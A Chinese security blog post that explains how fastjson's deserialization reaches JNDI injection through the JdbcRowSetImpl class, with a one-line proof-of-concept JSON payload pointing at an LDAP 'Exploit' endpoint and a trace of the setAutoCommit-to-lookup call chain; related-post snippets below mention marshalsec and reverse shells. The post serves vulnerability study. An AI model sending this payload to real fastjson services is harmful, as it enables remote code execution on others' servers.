【JAVA反序列化学习5】fastjson反序列化JdbcRowSetImpl类JNDI注入分析

最新推荐文章于 2024-09-17 07:00:00 发布
最新推荐文章于 2024-09-17 07:00:00 发布
阅读量932 收藏 1
点赞数 4
分类专栏: JAVA安全 文章标签: java 学习 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/GX233/article/details/125091091
版权

最近fastjson又出洞了,想起来还有链没填完,赶紧补完先。

fastjson反序列化JdbcRowSetImpl类JNDI注入分析

这次分析只要到达jndi.lookup就可以了。

直接上poc。

String t = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\", \"dataSourceName\":\"ldap://127.0.0.1:1389/Exploit\", \"autoCommit\":true}";
JSON.parseObject(t);

直接在JdbcRowSetImpl中搜索lookup

在这里插入图片描述

发现只有在connect方法处调用了lookup,参数是DataSourceName。需要找到在fastjson反序列化过程中,setter或者getter有调用到connect的地方。直接搜。

找到了两个可能的地方。一个是getDatabaseMetaData中。

public DatabaseMetaData getDatabaseMetaData() throws SQLException {
    Connection var1 = this.connect();
    return var1.getMetaData();
}

另一个是setAutoCommit

public void setAutoCommit(boolean var1) throws SQLException {
    if (this.conn != null) {
        this.conn.setAutoCommit(var1);
    } else {
        this.conn = this.connect();
        this.conn.setAutoCommit(var1);
    }

}

动态跟踪一下,看看先,最先进到的是setAutoCommit。

在这里插入图片描述
在这里插入图片描述

DataSourceName也在反序列化中由setter写入我们指定的ldap服务器的地址了。然后啊,然后就没有了,然后就是jndi注入了。

至于getDatabaseMetaData,则不会调用到,因为在反序列化过程中调用的getter必须继承自Collection Map AtomicBoolean AtomicInteger AtomicLong的getter方法,这在之前BCEL那条链中讲到过。

总结一下调用链。

parse->setValue->setAutoCommit->connect->lookup

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BCRIWvAn-1654091761401)(images/Be4vulWVW4Pgj_QHchkURwz6cv_mqYQcCEJHPi8SF94.png)]

Cgxx
关注
专栏目录
Java-Fastjson 反序列化
The current road is different, love needs to distinguish between right and wrong
02-28 5197
简介 以bugku的一道题为例: ctf.bugku Java Fastjson 漏洞验证 使用python脚本测试一下漏洞存在。 环境搭建 这里我使用RMI服务进行漏洞利用,所以先搭建Java rmi服务,因为不是在本地测试,这里是在公网服务器上搭建的。 下载一个marshalsec git clone https://github.com/mbechler/marshalsec 新建一个用于执行命令的java文件 vi fastjson.java
jdbc+fastjson
08-09
下载资源之后将资源解压开,然后导入eclipse中就可以了。如果是web项目注意还要将资源放在WEB-INF目录下的lib文件夹下面
Fastjson 反序列化 Jndi 注入利用 JdbcRowSetImpl
Love&Share
02-26 5498
文章目录Fastjson 反序列化Fastjson 组件使用案例漏洞原理Jndi注入利用JdbcRowSetImpl链原理复现调试高级利用-推荐阅读Fastjson姿势技巧fastjson检测参考文章 Fastjson 反序列化 Fastjson 组件是阿里巴巴开发的反序列化与序列化组件 Fastjson组件在反序列化不可信数据时会导致远程代码执行。究其原因: Fastjson 提供了反序列化功能,允许用户在输入 JSON 串时通过 “@type” 键对应的 value 指定任意反序列化名 Fastj.
Fastjson反序列化漏洞——JNDI注入
最新发布
2301_79096184的博客
09-17 1837
JNDI注入
Java代码审计——Fastjson JdbcRowSetImpl调用链
王嘟嘟的博客
12-09 1256
0x00 前言 反序列化总纲 单独的把fastjson的调用链拎出来进行分析fastjson可参考:https://blog.csdn.net/qq_36869808/article/details/121697765?spm=1001.2014.3001.5501 0x01 JdbcRowSetImpl 这里要是需要使用JNDI就必须通过lookup方法,这个参考:待填坑。 首先来看fastjson payload,有两个参数:一个是dataSourceName,另外一个是autoCommit {"@
fastjson jar包_fastjson 中的jndi注入
weixin_39979617的博客
11-20 209
0x01 前言前一章简单介绍了jndi注入的知识,这一章主要是分析一下fastjson 1.2.24版本的反序列化漏洞,这个漏洞比较普遍的利用手法就是通过jndi注入的方式实现RCE,所以我觉得是一个挺好的JNDI注入实践案例。0x02 fastjson反序列化特点不同于我们之前提到的java反序列化fastjson的序列化有其自身特点,我们通过一些小demo来展示如何使用fastjson。我们...
fastjson 反序列化之mysql JDBC 利用
qq_42077227的博客
04-19 3301
在打春秋云境Exchange 靶场时,入口点是华夏ERP 2.3版本系统,存在fastjson 反序列化漏洞,在尝试常见的fastjson利用链反弹shell都没有反应,最终使用mysql JDBC利用链反弹shell成功。在此记录一下。
fastjson反序列化JdbcRowSetImpl
qq_40710190的博客
07-08 413
fastjson利用链
JNDI加载RMIServer,对FastJson反序列化攻击,.zip
09-30
这个压缩包文件的标题“JNDI加载RMIServer,对FastJson反序列化攻击”揭示了一个常见的安全漏洞,即FastJson反序列化漏洞。让我们深入探讨这个话题。 首先,JNDIJava Naming and Directory Interface)是一种...
逆向学习fastjson反序列化
Summer's blog
07-26 7571
前言 text:json文本数据 len:json文本数据长度 token:代表解析到的这一段数据的型 ch:当前读取到的字符 bp:当前字符索引 sbuf:正在解析段的数据,char数组 sp:sbuf最后一个数据的索引 hasSpecial=false:需要初始化或者扩容sbuf 参考 http://www.b1ue.cn/archives/184.html ...
fastjson 1.2.24 反序列化导致任意命令执行漏洞复现
薛定谔嘚喵博客
05-30 1213
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,的作用就是把java对象转换为json形式,也可 以用来将json转换为java对象。fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的,并调用该set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。
Fastjson 1.2.24远程代码执行漏洞(com.sun.rowset.JdbcRowSetImpl
further_eye的博客
11-16 4110
漏洞是利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险,并调用危险连接远程rmi主机,通过其中的恶意执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据进行修改,增加,删除等操作,对服务器造成巨大的影响。
Java反序列化利用链篇 | JdbcRowSetImpl利用链分析
哦 卷!
09-07 370
首先说明一下:利用链都有自己的使用场景,要根据场景进行选择不同的利用链。JdbcRowSetImpl利用链用于fastjson反序列化漏洞中。为什么?因为fastjson会在反序列化时自动调用set开头的方法(不一定是setter方法),而JdbcRowSetImpl中存在一个set开头的方法,即,该这个方法中调用了connect()方法,connect()方法返回值是Connection。
【入坑JAVA安全fastjson中的jndi注入
一个安全研究员
04-24 2551
我写的如何?
Web】速谈FastJson反序列化JdbcRowSetImpl的利用
uuzeray的博客
03-03 733
继续看connect方法,显然conn为空且我们有DataSourceName属性,进到else if的分支,调用(new InitialContext()).lookup(),经典何须多言,只要dataSourceName设为恶意远程RMI服务或LDAP服务打JNDI即可。fastjson的第二条链JdbcRowSetImpl,主要是利用jndi注入达到的攻击,而且没有什么利用限制,其原理就是setter的自动调用。开一个恶意LDAP服务器。找个端口放恶意字节码。
JDK 1.5学习RowSet
代码人生
03-19 1218
在jdk1.4的javax.sql包中有一个RowSet接口,但是没有具体实现的。"Tiger"诞生之后,引入了  javax.sql.rowset包中的五个子接口和com.sun.rowset包里面的对应的五个实现,这样我们就可是使用功能强大的 RowSet 了。jdk1.5中RowSet的五个子接口分别是JdbcRowSet,CachedRowSet,WebRowSet, JoinRowS
14-java安全——fastjson1.2.24反序列化JdbcRowSetImpl利用链分析
网络安全
09-01 827
fastjson在1.2.24版本中,除了TemplatesImpl链之外,还有一个JdbcRowSetImpl利用链,JdbcRowSetImpl链有两种利用方式:一种是RMI和JNDI利用方式,另一种是JNDI和LDAP利用方式,关于JNDI的相关概念之前在java安全基础中已经介绍过了,而且底层原理已经分析过了,大家可自行参考以下文章。 4-java安全基础——RMI远程调用 5-java安全基础——RMI和JNDI实现漏洞利用 6-java安全基础——JNDI和LDAP利用 1. RMI
JAVA详细思路|Java安全FastJson JdbcRowSetImpl分析
m0_57227221的博客
05-17 1104
Java安全FastJson JdbcRowSetImpl分析 0x00 前言 这一次我们来学习 JdbcRowSetImpl 利用链, JdbcRowSetImpl 的利用链在实际运用中较为广泛,这个链基本没啥限制条件,只需要 Json.parse(input) 即可进行命令执行。 0x01 漏洞分析 利用限制 首先来说说限制,基于JNDI+RMI或JDNI+LADP进行攻击,会有一定的JDK版本限制。 RMI利用的JDK版本≤ JDK 6u132、7u122、8u113 LADP利用JDK版本≤
手写Java序列化与反序列化框架实践
"本文主要介绍了如何手写一个简单的序列化和反序列化框架,并探讨了序列化的基本概念、安全问题以及实现方式。" 在软件开发中,序列化和反序列化是两个重要的概念,它们涉及到对象状态的保存与恢复。序列化是将对象...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cgxx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值